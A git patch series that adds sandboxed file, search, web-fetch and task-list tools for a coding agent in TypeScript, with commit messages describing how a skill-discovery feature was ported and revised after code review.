+  limit: z.number().optional().describe("Maximum number of results. Default: 100"),
+});
+
+const GLOB_TIMEOUT_MS = 30_000;
+const DEFAULT_LIMIT = 100;
+
+/**
+ * `glob` — find files matching a glob pattern, sorted by mtime (newest
+ * first). Skips hidden files and `node_modules`. Uses `find -printf` on
+ * GNU find (Linux sandboxes), falling back to `xargs stat` on BSD find.
+ *
+ * Only the last pattern segment is handed to `find -name`; leading literal
+ * segments narrow the search root and a `**` segment lifts the depth cap.
+ */
+export const globTool = tool({
+  description: `Find files matching a glob pattern.
+
+WHEN TO USE:
+- Locating files by extension or naming pattern (e.g., all *.test.ts files)
+- Discovering where components, migrations, or configs live
+- Getting a quick list of recently modified files of a given type
+
+WHEN NOT TO USE:
+- Searching inside file contents (use grepTool instead)
+- Reading file contents (use readFileTool instead)
+
+USAGE:
+- Supports patterns like "**/*.ts", "src/**/*.js", "*.json"
+- Returns FILES (not directories) sorted by modification time (newest first)
+- Skips hidden files (names starting with ".") and node_modules
+- If path is omitted, the current working directory is used as the base
+- Use workspace-relative paths when setting path
+- Results are limited by the limit parameter (default: 100)
+
+IMPORTANT:
+- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support
+- Use this to narrow down candidate files before calling readFileTool or grepTool`,
+  inputSchema: globInputSchema,
+  execute: async (
+    { pattern, path: basePath, limit = DEFAULT_LIMIT },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "glob");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      let searchDir: string;
+      if (basePath) {
+        searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath);
+      } else {
+        searchDir = workingDirectory;
+      }
+
+      // Extract file-name pattern (last segment) + literal directory prefix
+      // (segments before any wildcards) so we can constrain `find -maxdepth`.
+      const patternParts = pattern.split("/").filter(Boolean);
+      const namePattern = patternParts[patternParts.length - 1] ?? "*";
+      const literalPrefix: string[] = [];
+      for (let i = 0; i < patternParts.length - 1; i++) {
+        const part = patternParts[i]!;
+        if (part.includes("*") || part.includes("?") || part.includes("[")) break;
+        literalPrefix.push(part);
+      }
+      if (literalPrefix.length > 0) {
+        searchDir = path.join(searchDir, ...literalPrefix);
+      }
+
+      const remainingDirSegments = patternParts.slice(
+        literalPrefix.length,
+        patternParts.length - 1,
+      );
+      const hasRecursiveWildcard =
+        remainingDirSegments.some(s => s === "**") || namePattern === "**";
+
+      let maxDepth: number | undefined;
+      if (!hasRecursiveWildcard) {
+        maxDepth = remainingDirSegments.length + 1;
+      }
+
+      const findArgs: string[] = ["find", shellEscape(searchDir)];
+      if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth));
+      findArgs.push(
+        "-not",
+        "-path",
+        "'*/.*'",
+        "-not",
+        "-path",
+        "'*/node_modules/*'",
+        "-type",
+        "f",
+        "-name",
+        shellEscape(namePattern),
+      );
+
+      // `head -n` needs a whole, non-negative count: head rejects a fractional
+      // value, and GNU head reads a negative one as "all but the last N
+      // lines". Non-finite values fall back to the default.
+      const maxResults = Number.isFinite(limit) ? Math.max(0, Math.floor(limit)) : DEFAULT_LIMIT;
+
+      // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility.
+      const findBase = findArgs.join(" ");
+      const command = [
+        `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`,
+        `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`,
+        `| sort -t$'\\t' -k1 -rn | head -n ${maxResults}`,
+      ].join(" ");
+
+      const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // find may exit 1 on permission errors but still produce valid output.
+      if (!result.success && result.exitCode !== 1) {
+        const errorOutput = (result.stderr || result.stdout).slice(0, 500);
+        return {
+          success: false,
+          error: `Glob failed (exit ${result.exitCode}): ${errorOutput}`,
+        };
+      }
+
+      const files: FileInfo[] = [];
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        const firstTab = line.indexOf("\t");
+        if (firstTab === -1) continue;
+        const secondTab = line.indexOf("\t", firstTab + 1);
+        if (secondTab === -1) continue;
+        const mtimeSeconds = parseFloat(line.slice(0, firstTab));
+        const size = parseInt(line.slice(firstTab + 1, secondTab), 10);
+        const filePath = line.slice(secondTab + 1);
+        if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue;
+        files.push({
+          path: toDisplayPath(filePath, workingDirectory),
+          size,
+          modifiedAt: mtimeSeconds * 1000,
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        baseDir: toDisplayPath(searchDir, workingDirectory),
+        count: files.length,
+        files: files.map(f => ({
+          path: f.path,
+          size: f.size,
+          modifiedAt: new Date(f.modifiedAt).toISOString(),
+        })),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Glob failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts
new file mode 100644
index 000000000..f172f61af
--- /dev/null
+++ b/lib/agent/tools/grepTool.ts
@@ -0,0 +1,152 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface GrepMatch {
+  file: string;
+  line: number;
+  content: string;
+}
+
+const grepInputSchema = z.object({
+  pattern: z.string().describe("Regex pattern to search for"),
+  path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"),
+  glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"),
+  caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"),
+});
+
+const GREP_TIMEOUT_MS = 30_000;
+const MAX_TOTAL_MATCHES = 100;
+const MAX_PER_FILE_MATCHES = 10;
+const MAX_LINE_LENGTH = 200;
+
+/**
+ * `grep` — search for POSIX-ERE patterns across files in the sandbox via
+ * `grep -rnH`. Caps results to 100 total / 10 per file / 200 chars per
+ * match line so long stdouts don't blow the model context.
+ *
+ * grep's exit status 1 (no matches) is not treated as a failure.
+ */
+export const grepTool = tool({
+  description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE).
+
+WHEN TO USE:
+- Finding where a function, variable, or string literal is used
+- Locating configuration keys, routes, or error messages across files
+- Narrowing down which files to read or edit
+
+WHEN NOT TO USE:
+- Simple filename-only searches (use globTool instead)
+- Directory listings, builds, or other shell tasks (use bashTool instead)
+
+USAGE:
+- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+")
+- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]]
+- Search a specific file OR an entire directory via the path parameter
+- Use workspace-relative paths for path (e.g., "src")
+- Optionally filter files with glob (e.g., "*.ts", "*.test.js")
+- Matches are SINGLE-LINE: patterns do not span across newline characters
+- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters
+
+IMPORTANT:
+- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool
+- Use caseSensitive: false for case-insensitive searches
+- Hidden files and node_modules are skipped when searching directories`,
+  inputSchema: grepInputSchema,
+  execute: async (
+    { pattern, path: searchPath, glob, caseSensitive = true },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "grep");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(searchPath)
+        ? searchPath
+        : path.resolve(workingDirectory, searchPath);
+
+      // -H forces the `file:` prefix even when `path` is a single file;
+      // without it grep prints only `line:content` there and the parser
+      // below would drop every match.
+      const args: string[] = ["grep", "-rnH"];
+      if (!caseSensitive) args.push("-i");
+      args.push(
+        `--exclude-dir=${shellEscape(".*")}`,
+        `--exclude-dir=${shellEscape("node_modules")}`,
+      );
+      if (glob) args.push(`--include=${shellEscape(glob)}`);
+      // `-e` and `--` keep a pattern that starts with "-" (e.g. "->") from
+      // being parsed as a grep option.
+      args.push(
+        "-m",
+        String(MAX_PER_FILE_MATCHES),
+        "-E",
+        "-e",
+        shellEscape(pattern),
+        "--",
+        shellEscape(absolutePath),
+      );
+      const command = args.join(" ");
+
+      const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // grep exits with 1 when no matches found — that's not an error.
+      if (!result.success && result.exitCode !== 1) {
+        const errorOutput = (result.stderr || result.stdout).slice(0, 500);
+        return {
+          success: false,
+          error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`,
+        };
+      }
+
+      const matches: GrepMatch[] = [];
+      const filesSet = new Set<string>();
+      const fileMatchCounts = new Map<string, number>();
+
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        if (matches.length >= MAX_TOTAL_MATCHES) break;
+
+        // grep -rnH output: file:line:content. Find the `:digits:` separator.
+        const match = line.match(/:(\d+):/);
+        if (!match || match.index === undefined) continue;
+        const file = line.slice(0, match.index);
+        const rest = line.slice(match.index + 1);
+        const colonIndex = rest.indexOf(":");
+        if (colonIndex === -1) continue;
+
+        const lineNum = parseInt(rest.slice(0, colonIndex), 10);
+        const content = rest.slice(colonIndex + 1);
+        if (isNaN(lineNum)) continue;
+
+        const displayFile = toDisplayPath(file, workingDirectory);
+        filesSet.add(displayFile);
+        const currentFileCount = fileMatchCounts.get(displayFile) ?? 0;
+        if (currentFileCount >= MAX_PER_FILE_MATCHES) continue;
+
+        fileMatchCounts.set(displayFile, currentFileCount + 1);
+        matches.push({
+          file: displayFile,
+          line: lineNum,
+          content: content.slice(0, MAX_LINE_LENGTH),
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        matchCount: matches.length,
+        filesWithMatches: filesSet.size,
+        matches,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Grep failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts
new file mode 100644
index 000000000..f5a486a64
--- /dev/null
+++ b/lib/agent/tools/readFileTool.ts
@@ -0,0 +1,77 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const readInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"),
+  offset: z.number().optional().describe("Line number to start reading from (1-indexed)"),
+  limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"),
+});
+
+/**
+ * `read` — read a file from the sandbox. Returns numbered lines in the
+ * format `N: <content>` so the model can refer to specific lines when
+ * later editing.
+ *
+ * `totalLines` counts the pieces of `content.split("\n")`, so a file that
+ * ends with a newline reports one extra, empty final line.
+ */
+export const readFileTool = tool({
+  description: `Read a file from the filesystem.
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/index.ts")
+- Paths are resolved from the workspace root
+- By default reads up to 2000 lines starting from line 1
+- Use offset and limit for long files (both are line-based, 1-indexed)
+- Results include line numbers starting at 1 in "N: content" format
+
+IMPORTANT:
+- Always read a file at least once before editing it with the edit/write tools
+- This tool can only read files, not directories — attempting to read a directory returns an error
+- You can call multiple reads in parallel to speculatively load several files`,
+  inputSchema: readInputSchema,
+  execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "read");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+
+      const stats = await sandbox.stat(absolutePath);
+      if (stats.isDirectory()) {
+        return {
+          success: false,
+          error: "Cannot read a directory. Use glob or ls command instead.",
+        };
+      }
+
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+      const lines = content.split("\n");
+      // Coerce to whole, non-negative values: a fractional offset would leak
+      // into the "N: " prefixes and a negative limit would make slice() count
+      // from the end of the file.
+      const startLine = Math.max(1, Math.floor(offset)) - 1;
+      const maxLines = Math.max(0, Math.floor(limit));
+      const endLine = Math.min(lines.length, startLine + maxLines);
+      const selectedLines = lines.slice(startLine, endLine);
+      const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        totalLines: lines.length,
+        startLine: startLine + 1,
+        endLine,
+        content: numberedLines.join("\n"),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts
new file mode 100644
index 000000000..8ba4a71a3
--- /dev/null
+++ b/lib/agent/tools/shellEscape.ts
@@ -0,0 +1,15 @@
+/**
+ * Quote an arbitrary string so a POSIX shell reads it as one literal word.
+ *
+ * The value is wrapped in single quotes, inside which the shell performs
+ * no expansion. The only character that cannot appear there is the single
+ * quote itself, so each one is emitted as `'\''`: end the quoted run, add a
+ * backslash-escaped quote, start a new quoted run.
+ *
+ * @param s - The string to escape.
+ * @returns The single-quoted form of `s`.
+ */
+export function shellEscape(s: string): string {
+  const quoted = s.split("'").join("'\\''");
+  return `'${quoted}'`;
+}
diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts
new file mode 100644
index 000000000..827c391af
--- /dev/null
+++ b/lib/agent/tools/toDisplayPath.ts
@@ -0,0 +1,38 @@
+import * as path from "path";
+
+/**
+ * Report whether `filePath` is `directory` itself or lies beneath it, judged
+ * on the `path.resolve`d forms of both arguments.
+ */
+function isPathWithinDirectory(filePath: string, directory: string): boolean {
+  const target = path.resolve(filePath);
+  const root = path.resolve(directory);
+  if (target === root) return true;
+  return target.startsWith(root + path.sep);
+}
+
+/**
+ * Produce the short path form shown to the model in tool output.
+ *
+ * A path located inside `workingDirectory` is rendered relative to it (for
+ * example `src/index.ts`), and the working directory itself becomes `.`.
+ * A path outside it is returned in absolute form (for example `/etc/hosts`).
+ * Backslashes in the result are replaced with `/`.
+ *
+ * @param filePath - Absolute path, or a path relative to `workingDirectory`.
+ * @param workingDirectory - The sandbox's working directory (always absolute).
+ * @returns The display path described above.
+ */
+export function toDisplayPath(filePath: string, workingDirectory: string): string {
+  const resolved = path.isAbsolute(filePath)
+    ? path.resolve(filePath)
+    : path.resolve(workingDirectory, filePath);
+  const toForwardSlashes = (p: string): string => p.replace(/\\/g, "/");
+
+  if (!isPathWithinDirectory(resolved, workingDirectory)) {
+    return toForwardSlashes(resolved);
+  }
+
+  const relative = path.relative(workingDirectory, resolved);
+  return relative === "" ? "." : toForwardSlashes(relative);
+}
diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts
new file mode 100644
index 000000000..d91e9147a
--- /dev/null
+++ b/lib/agent/tools/todoWriteTool.ts
@@ -0,0 +1,67 @@
+import { tool } from "ai";
+import { z } from "zod";
+
+/** Allowed lifecycle states for a todo item. */
+export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]);
+export type TodoStatus = z.infer<typeof todoStatusSchema>;
+
+/** One entry of the task list: an id, its description and its status. */
+export const todoItemSchema = z.object({
+  id: z.string().describe("Unique identifier for the todo item"),
+  content: z.string().describe("The task description"),
+  status: todoStatusSchema.describe(
+    "Current status. Only ONE task should be in_progress at a time.",
+  ),
+});
+export type TodoItem = z.infer<typeof todoItemSchema>;
+
+/** Tool input: the complete list that supersedes the previous one. */
+const todoWriteInputSchema = z.object({
+  todos: z
+    .array(todoItemSchema)
+    .describe("The complete list of todo items. This replaces existing todos."),
+});
+
+/**
+ * `todo_write` — the agent's planning tool. `execute` holds no state: it
+ * returns the submitted list unchanged, together with a message reporting
+ * how many items it contains.
+ *
+ * Slot into `buildAgentTools` as `todo_write: todoWriteTool`.
+ */
+export const todoWriteTool = tool({
+  description: `Create and manage a structured task list for the current session.
+
+WHEN TO USE:
+- Complex multi-step tasks requiring 3 or more distinct steps
+- When the user provides multiple requirements or a checklist
+- After receiving new instructions - immediately capture them as todos
+- When starting work on a task - mark that todo as in_progress BEFORE beginning
+- After completing a task - mark it as completed immediately
+
+WHEN NOT TO USE:
+- A single, straightforward task that can be done in one step
+- Trivial tasks requiring fewer than 3 minor steps
+- Purely conversational or informational queries
+
+TASK STATES:
+- "pending": Task not yet started
+- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time)
+- "completed": Task finished successfully
+
+USAGE:
+- This tool REPLACES the entire todo list - always send the full, updated list of todos
+- Use it frequently to keep the task list in sync with your actual progress
+- Update statuses as you start and finish work, rather than batching updates later
+
+IMPORTANT:
+- Only one todo should be in_progress at a time; avoid parallel in_progress tasks
+- Mark todos as completed as soon as they are done - do not wait to batch completions
+- Use clear, concise todo content so the list remains readable to the user`,
+  inputSchema: todoWriteInputSchema,
+  execute: async ({ todos }) => ({
+    success: true,
+    message: `Updated task list with ${todos.length} items`,
+    todos,
+  }),
+});
diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts
new file mode 100644
index 000000000..b395457f9
--- /dev/null
+++ b/lib/agent/tools/webFetchTool.ts
@@ -0,0 +1,130 @@
+import { tool } from "ai";
+import { z } from "zod";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+const FETCH_TIMEOUT_MS = 30_000;
+export const MAX_BODY_LENGTH = 10_000;
+
+const fetchInputSchema = z.object({
+  url: z.string().url().describe("The URL to fetch"),
+  method: z
+    .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"])
+    .optional()
+    .describe("HTTP method. Default: GET"),
+  headers: z
+    .record(z.string(), z.string())
+    .optional()
+    .describe("Optional HTTP headers as key-value pairs"),
+  body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"),
+});
+
+const fetchOutputSchema = z.union([
+  z.object({
+    success: z.literal(true),
+    status: z.number().int().nullable(),
+    body: z.string(),
+    truncated: z.boolean(),
+  }),
+  z.object({ success: z.literal(false), error: z.string() }),
+]);
+
+/**
+ * `web_fetch` — make an HTTP request from inside the sandbox via curl.
+ * Lives in the sandbox (not on the worker) so requests come from the
+ * sandbox's network egress, can reuse its env, and don't bypass any
+ * sandbox-level policies. Truncates response bodies to 10KB to protect
+ * model context.
+ *
+ * HEAD requests use curl's `--head`, so for HEAD the returned `body` is the
+ * response header text.
+ */
+export const webFetchTool = tool({
+  description: `Fetch a URL from the web.
+
+USAGE:
+- Make HTTP requests to external URLs
+- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods
+- Returns the response status and body text
+- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`,
+  inputSchema: fetchInputSchema,
+  outputSchema: fetchOutputSchema,
+  execute: async (
+    { url, method = "GET", headers, body },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "web_fetch");
+    const workingDirectory = sandbox.workingDirectory;
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+
+    const args: string[] = [
+      "curl",
+      "-sS",
+      // `-X HEAD` only renames the verb and curl still waits for a body;
+      // `--head` makes a proper HEAD request and emits the response headers.
+      ...(method === "HEAD" ? ["--head"] : ["-X", method]),
+      "--max-time",
+      String(Math.ceil(FETCH_TIMEOUT_MS / 1000)),
+      "-o",
+      `>(head -c ${MAX_BODY_LENGTH} >&3)`,
+      "-w",
+      shellEscape("%{http_code}"),
+    ];
+
+    if (headers) {
+      for (const [key, value] of Object.entries(headers)) {
+        args.push("-H", shellEscape(`${key}: ${value}`));
+      }
+    }
+    if (method !== "GET" && method !== "HEAD" && body) {
+      // --data-raw sends the body verbatim; plain -d would treat a leading
+      // "@" as "read the body from this file".
+      args.push("--data-raw", shellEscape(body));
+    }
+    args.push(shellEscape(url));
+
+    // Use fd 3 to split curl's response body (truncated by `head -c`) from
+    // the status code written via `-w`. The body goes to stdout via fd 3
+    // → fd 1, then we append the status code on its own newline.
+    const command = [
+      "exec 3>&1",
+      `status=$(${args.join(" ")})`,
+      "curlExit=$?",
+      "exec 3>&-",
+      "printf '\\n%s' \"$status\"",
+      "exit $curlExit",
+    ].join("\n");
+
+    try {
+      const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses).
+      if (result.exitCode !== 0 && result.exitCode !== 23) {
+        return {
+          success: false,
+          error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`,
+        };
+      }
+
+      const output = result.stdout ?? "";
+      const lastNewline = output.lastIndexOf("\n");
+      const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : "";
+      const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output;
+      const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null;
+
+      return {
+        success: true,
+        status,
+        body: responseBody,
+        truncated: result.exitCode === 23,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Fetch failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts
new file mode 100644
index 000000000..c8e59e3c3
--- /dev/null
+++ b/lib/agent/tools/writeFileTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const writeInputSchema = z.object({
+  filePath: z
+    .string()
+    .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"),
+  content: z.string().describe("Content to write to the file"),
+});
+
+/**
+ * `write` — create or completely overwrite a file in the sandbox. Parent
+ * directories are created as needed. For small targeted edits prefer
+ * `editFileTool`.
+ */
+export const writeFileTool = tool({
+  description: `Write content to a file on the filesystem.
+
+WHEN TO USE:
+- Creating a new file that does not yet exist
+- Completely replacing the contents of an existing file after you've read it
+
+WHEN NOT TO USE:
+- Small or localized changes to an existing file (prefer editFileTool)
+- Reading files (use readFileTool instead)
+- Searching (use grepTool or globTool instead)
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/user.test.ts")
+- This will OVERWRITE existing files entirely
+- Parent directories are created automatically if they do not exist
+
+IMPORTANT:
+- ALWAYS read an existing file with readFileTool before overwriting it
+- Prefer editing existing files over creating new ones unless a new file is explicitly needed
+- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them
+- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`,
+  inputSchema: writeInputSchema,
+  execute: async ({ filePath, content }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "write");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const dir = path.dirname(absolutePath);
+      await sandbox.mkdir(dir, { recursive: true });
+      await sandbox.writeFile(absolutePath, content, "utf-8");
+      const stats = await sandbox.stat(absolutePath);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        bytesWritten: stats.size,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to write file: ${message}` };
+    }
+  },
+});

From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 14:47:56 -0500
Subject: [PATCH 05/10] feat(chat-workflow): port skill discovery + skillTool
 (PR 6, slim) (#587)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |   2 +-
 lib/agent/__tests__/buildAgentTools.test.ts   |  47 ++++-
 lib/agent/buildAgentTools.ts                  |  24 +--
 lib/agent/tools/AgentContext.ts               |  11 ++
 lib/agent/tools/__tests__/skillTool.test.ts   | 169 ++++++++++++++++++
 lib/agent/tools/skillTool.ts                  |  87 +++++++++
